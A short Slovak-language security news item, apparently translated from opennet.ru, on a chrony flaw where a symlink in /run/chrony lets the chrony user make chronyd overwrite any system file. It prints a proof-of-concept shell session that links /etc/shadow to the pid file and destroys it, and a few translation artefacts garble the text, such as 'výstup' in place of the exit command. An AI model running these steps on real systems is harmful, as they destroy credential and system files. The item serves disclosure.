В
Zraniteľnosť je spôsobená nebezpečným vytvorením súboru pid, ktorý bol vytvorený vo fáze, keď chrony ešte neresetoval privilégiá a bežal ako root. V tomto prípade bol adresár /run/chrony, v ktorom je zapísaný súbor pid, vytvorený s právami 0750 cez systemd-tmpfiles alebo pri spustení chronyd v spojení s používateľom a skupinou „chrony“. Ak teda máte prístup k užívateľovi chrony, je možné nahradiť pid súbor /run/chrony/chronyd.pid symbolickým odkazom. Symbolický odkaz môže ukazovať na akýkoľvek systémový súbor, ktorý bude prepísaný pri spustení chronydu.
root# systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ výstup
root# /usr/sbin/chronyd -n
^C
# namiesto obsahu /etc/shadow sa uloží ID procesu chronyd
root# cat /etc/shadow
15287
Zraniteľnosť
Problém SUSE a openSUSE
Zdroj: opennet.ru